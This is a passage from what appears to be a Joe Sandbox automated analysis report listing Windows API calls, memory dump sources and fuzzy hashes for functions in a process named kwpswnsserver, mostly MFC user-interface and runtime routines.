                                                                  • IsWindow.USER32(?), ref: 6C89267C
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8926AC
                                                                  • SendMessageW.USER32(?,0000020A,?,?), ref: 6C89270A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientMessageScreenSendWindow
                                                                  • String ID:
                                                                  • API String ID: 2093367132-0
                                                                  • Opcode ID: 2076ebe697578d5239f0a68c7de1c66bdb791b38cae6637f46aa68cab76f8719
                                                                  • Instruction ID: 6614c4603df77422b0ae80958489e556c8e497386d54e14939da7a6ff7757ec6
                                                                  • Opcode Fuzzy Hash: 2076ebe697578d5239f0a68c7de1c66bdb791b38cae6637f46aa68cab76f8719
                                                                  • Instruction Fuzzy Hash: 3E41C131606206AADB329F7CCF5CB6A7AB5FF06348F204E29E465E2DA5D739D940C710
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • SendMessageW.USER32(?,0000043D,00000000,00000000), ref: 6C88826E
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C88827F
                                                                  • SendMessageW.USER32(?,0000043C,00000001,00000000), ref: 6C888293
                                                                  • SendMessageW.USER32(?,0000043C,00000000,00000000), ref: 6C8882A4
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C8882B3
                                                                  • InvalidateRect.USER32(?,00000000,00000001,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6C887C50), ref: 6C888346
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$InvalidateLongRectWindow
                                                                  • String ID:
                                                                  • API String ID: 74886174-0
                                                                  • Opcode ID: bf4ef769d31976a2f54236e4dde68e88522eec0958675ceea0a5393dadcb8a5e
                                                                  • Instruction ID: 7578b9aad6f414158c3794075db42fa930fef1d97e03b0bc833f7b1f72f9ba00
                                                                  • Opcode Fuzzy Hash: bf4ef769d31976a2f54236e4dde68e88522eec0958675ceea0a5393dadcb8a5e
                                                                  • Instruction Fuzzy Hash: 7041BA31740229ABDF259F64CC99FEEBB75FF49354F044125FA05AB690EB70A802CB90
                                                                  APIs
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C8C8B8B
                                                                  • GetParent.USER32(?), ref: 6C8C8BAC
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C8BC9
                                                                  • GetClientRect.USER32(?,?), ref: 6C8C8C6C
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8C8C7E
                                                                  • DrawThemeBackground.UXTHEME(?,?,00000000,00000000,?,00000000), ref: 6C8C8CA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$BackgroundClientDrawFillParentPointsTheme
                                                                  • String ID:
                                                                  • API String ID: 2136005349-0
                                                                  • Opcode ID: 80b9309b9f198049fdc4ec9eea1356dc028b00f987503b70398f083fc0d0a06e
                                                                  • Instruction ID: 49fcfdc3150a0f4b1cfdfa224f547c4ecb1459844be35042855da0d2097073da
                                                                  • Opcode Fuzzy Hash: 80b9309b9f198049fdc4ec9eea1356dc028b00f987503b70398f083fc0d0a06e
                                                                  • Instruction Fuzzy Hash: 6C414871A41319DFCB10DF69CE849AE7BB4FF49314B15866AE805E7610E730E941CBA1
                                                                  APIs
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2D11
                                                                  • ReleaseCapture.USER32 ref: 6C8C2D1F
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2D74
                                                                  • InvalidateRect.USER32(?,?,00000001,?,?,?,6C8C1E6F,00000000,00000000,00000000), ref: 6C8C2DDE
                                                                  • SetTimer.USER32(?,0000EC16,00000050,00000000), ref: 6C8C2E02
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CaptureInvalidateReleaseTimer
                                                                  • String ID:
                                                                  • API String ID: 2903485716-0
                                                                  • Opcode ID: 2d4c27f66ac127563c0382211cdec048fac3ca20adc8fd7422579b3009cb210d
                                                                  • Instruction ID: 125c2f2aeb4359f214ca5494c1bdd866cb8dc1f56f527c109dc73f1849c6101b
                                                                  • Opcode Fuzzy Hash: 2d4c27f66ac127563c0382211cdec048fac3ca20adc8fd7422579b3009cb210d
                                                                  • Instruction Fuzzy Hash: 6931B03130030BEFDF289F24CD48BAABB75FF49316F048625E92992590DB34E421DB91
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C89603E
                                                                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 6C896076
                                                                  • GlobalLock.KERNEL32(?), ref: 6C89607E
                                                                  • GlobalUnlock.KERNEL32(?), ref: 6C8960B2
                                                                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 6C8960F5
                                                                  • PostMessageW.USER32(?,000003E4,?,00000000), ref: 6C896101
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalParam$H_prolog3_catchLockMessagePostReuseUnlockUnpack
                                                                  • String ID:
                                                                  • API String ID: 4045269880-0
                                                                  • Opcode ID: 84eda93bb4f39ed0c968acd132866bf08d12a4750ec7668a3ac12600c9dafd51
                                                                  • Instruction ID: 3e8b8dde1501da7c99f8da0a140bea5185c7ea2cf3399bae5397bee8ca8b22cf
                                                                  • Opcode Fuzzy Hash: 84eda93bb4f39ed0c968acd132866bf08d12a4750ec7668a3ac12600c9dafd51
                                                                  • Instruction Fuzzy Hash: 6A31617090020ADFDF25DF58CE95AFEB775AF14309F104928E511B7690DB709E09CBA0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89ED84
                                                                  • CreateRectRgnIndirect.GDI32(00000000), ref: 6C89EDA4
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C8838FA
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C883910
                                                                  • GetParent.USER32(00000000), ref: 6C89EDC4
                                                                  • DrawThemeParentBackground.UXTHEME(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000018), ref: 6C89EDE5
                                                                  • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 6C89EE19
                                                                  • SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6C89EE45
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClipParentSelect$BackgroundCreateDrawH_prolog3IndirectMessagePointsRectSendThemeWindow
                                                                  • String ID:
                                                                  • API String ID: 935984306-0
                                                                  • Opcode ID: 480965e9141865ce8f2c4a780c53d9b6fd7236d0f55d40f732c11ced24b9edee
                                                                  • Instruction ID: 1e7898980a873c8d5a6591d4b363920ddc2c498ee08831a6fe6299aabfb93690
                                                                  • Opcode Fuzzy Hash: 480965e9141865ce8f2c4a780c53d9b6fd7236d0f55d40f732c11ced24b9edee
                                                                  • Instruction Fuzzy Hash: A8313E71A0021AEFDF21DFA8CD54BEE7BB5BF08705F104824E515A7A60DB35D905CB90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A487D
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • GetClientRect.USER32(?,?), ref: 6C8A489F
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8A48B3
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A1), ref: 6C883F5F
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A9), ref: 6C883F6C
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C8A48D4
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 6C883954
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 6C883971
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C8A48F6
                                                                    • Part of subcall function 6C88397E: IntersectClipRect.GDI32(?,?,?,?,?), ref: 6C8839B5
                                                                    • Part of subcall function 6C88397E: IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 6C8839D2
                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 6C8A492E
                                                                    • Part of subcall function 6C883E8D: ReleaseDC.USER32(?,00000000), ref: 6C883EC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Clip$Client$ExcludeIntersectOffsetScreenWindow$H_prolog3H_prolog3_MessageReleaseSend
                                                                  • String ID:
                                                                  • API String ID: 3860140383-0
                                                                  • Opcode ID: 1c6f1c22aabc4ddca12a180ece640c8bd45d962d74654422886797d800f64633
                                                                  • Instruction ID: 336df63938bdcad10a2a2de28a24ed2bbc098c85ab83f18cb6bca93fe499bf1a
                                                                  • Opcode Fuzzy Hash: 1c6f1c22aabc4ddca12a180ece640c8bd45d962d74654422886797d800f64633
                                                                  • Instruction Fuzzy Hash: A031FC72A0021EAFCF19DBA4CD54DFEB779BF59305F144219F506E3650EB24AA05CB60
APIs
• Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EE9A
• Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEB0
• Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEBB
• Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEC6
• Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EED1
• Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C90EEDC
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: ContextExternal$BaseBase::~Concurrency::details::
• String ID:
• API String ID: 1690591649-0
• Opcode ID: 8f15163159b232a196169065eaaf433dc4e9d715f686dadd0057c543a47b01b8
• Instruction ID: d28553a520539e2f5f5d77ab8b8aeddbae3913b18ffe18f8a9a718e5272792a5
• Opcode Fuzzy Hash: 8f15163159b232a196169065eaaf433dc4e9d715f686dadd0057c543a47b01b8
• Instruction Fuzzy Hash: 39217F32300915ABD71CDB68C8A0BEDB779FB61718F40466DD42A47A90EF20A91ACB95
APIs
• GetLastError.KERNEL32(00000001,?,6C9C28B6,6C8807DB,6C9C1EF5,?,00000007,6CA4F650,00000010,6C9C1F18,?,?,6C9C1FA1,?,00000001,?), ref: 6C9D807A
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C9D8088
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C9D80A1
• SetLastError.KERNEL32(00000000,00000007,6CA4F650,00000010,6C9C1F18,?,?,6C9C1FA1,?,00000001,?,?,00000001,?,6CA4F678,0000000C), ref: 6C9D80F3
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 61336d290a36d988d9de5819971cde883f4723b30e2a9ac93902e03256a96baa
• Instruction ID: b7303d95587910ccd99f268d814fe1533e64dc31ca8531104a6570f2369328bf
• Opcode Fuzzy Hash: 61336d290a36d988d9de5819971cde883f4723b30e2a9ac93902e03256a96baa
• Instruction Fuzzy Hash: DD01F93330DB629E971E1975DC845EB2778EB6627D361C32AE31062DD1EF11D8064188
APIs
• type_info::operator==.LIBVCRUNTIME ref: 6C9D8A7E
• CallUnexpected.LIBVCRUNTIME ref: 6C9D8CF7
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
• Opcode ID: 8cf6a241d77f8fdf08a5d8011232d3e0f8d904b55e2db21fff13e16969afb4d0
• Instruction ID: a2ffdb0fc74c27bdb4fb08cb983eb8a99ad08d4bb946c94bc444d76d6bd5ac1d
• Opcode Fuzzy Hash: 8cf6a241d77f8fdf08a5d8011232d3e0f8d904b55e2db21fff13e16969afb4d0
• Instruction Fuzzy Hash: 70B1A071901A09DFCF08CFA4D84099EB7B9BF24308F16959BE8107BA12D331EA51CBD9
APIs
• ClientToScreen.USER32(?,?), ref: 6C8A0216
• GetDlgCtrlID.USER32(00000000), ref: 6C8A0221
• GetWindowLongW.USER32(00000000,000000F0), ref: 6C8A0231
• GetWindowRect.USER32(00000000,?), ref: 6C8A024A
• PtInRect.USER32(?,?,?), ref: 6C8A025A
• GetWindow.USER32(?,00000005), ref: 6C8A0267
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Window$Rect$ClientCtrlLongScreen
• String ID:
• API String ID: 1315500227-0
• Opcode ID: d26576bcee23f3ae47eeae2145a90a545a0ca25c295ec5bdf03b2aa4eda7829c
• Instruction ID: eb3dc0c4a4e4471223480cbc3f8fb41e272aa588cf01e3ab67563f6ccd4e0ba3
• Opcode Fuzzy Hash: d26576bcee23f3ae47eeae2145a90a545a0ca25c295ec5bdf03b2aa4eda7829c
• Instruction Fuzzy Hash: CB018831A0536AABDF26DFA8CD14EDF7778EF06309F508615F416E6140DB30DA468791
APIs
• GetFocus.USER32 ref: 6C8A00AB
  • Part of subcall function 6C8A0147: GetWindowLongW.USER32(?,000000F0), ref: 6C8A0162
  • Part of subcall function 6C8A0147: GetClassNameW.USER32(?,?,0000000A), ref: 6C8A0177
  • Part of subcall function 6C8A0147: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,?,?,?,?,?,?,6C8879A6), ref: 6C8A018E
• GetParent.USER32(00000000), ref: 6C8A00CC
• GetWindowLongW.USER32(00000000,000000F0), ref: 6C8A00EB
• GetParent.USER32(00000000), ref: 6C8A00F9
• GetDesktopWindow.USER32 ref: 6C8A0101
• SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C8A0115
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
• String ID:
• API String ID: 1233893325-0
• Opcode ID: 9b7672d3b620b2e51ecd979df298bab07afa962df2bdaeec816f24043e0ebd19
• Instruction ID: 316e05d73b1733fd70a9f5c6269e1c8d9b1e74544b00f95a4c2449e4e6ec2dbd
• Opcode Fuzzy Hash: 9b7672d3b620b2e51ecd979df298bab07afa962df2bdaeec816f24043e0ebd19
• Instruction Fuzzy Hash: DCF0F93134137167D6363A658ED9BEE35785B86F59F204A24F92BE7680DB24C4034150
APIs
• __EH_prolog3_catch.LIBCMT ref: 6C8B05FC
  • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
  • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: CtrlH_prolog3H_prolog3_catch
• String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars
• API String ID: 905329913-3577816979
• Opcode ID: 59a0db12837ec05dcde8fc8b021b9d921f6f0200b86c3f61eabef0ca0238a441
• Instruction ID: 63373548723f753774a3cc8268270a5c0de79dfd5c73bb69db3d4dc0fb767b0e
• Opcode Fuzzy Hash: 59a0db12837ec05dcde8fc8b021b9d921f6f0200b86c3f61eabef0ca0238a441
• Instruction Fuzzy Hash: EF916D70A0020D9FCF24DF94CA84AEEB7B6BF89304F144468E415BB791DB31AD05CB61
APIs
• __EH_prolog3_GS.LIBCMT ref: 6C8C8982
• DrawThemeBackground.UXTHEME(00000000,?,00000001,00000000,?,00000000,?,?,?,?,?,?,?,0000001C), ref: 6C8C89B6
• InflateRect.USER32(?,000000FD,000000FD), ref: 6C8C89D8
• DrawThemeBackground.UXTHEME(00000000,?,00000003,00000000,?,00000000,?,?,?,?,?,?,?,?,0000001C), ref: 6C8C8A10
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: BackgroundDrawTheme$H_prolog3_InflateRect
• String ID: %d%%
• API String ID: 1553386484-1518462796
• Opcode ID: 86f1f510c5ff1cde69290aec14f1afc6f00f7a1438e076aa8adc04de3662da46
• Instruction ID: b57b118bdbbbc79ea8869f21c24a0c0e4290701ffc90e2fa87869053278c7494
• Opcode Fuzzy Hash: 86f1f510c5ff1cde69290aec14f1afc6f00f7a1438e076aa8adc04de3662da46
• Instruction Fuzzy Hash: D0415872A102099FCB14CF98CD84BDE77B9BF49305F144969E501AB690DB70E905CBA0
APIs
• __EH_prolog3_GS.LIBCMT ref: 6C894439
  • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
• swprintf.LIBCMT ref: 6C89448E
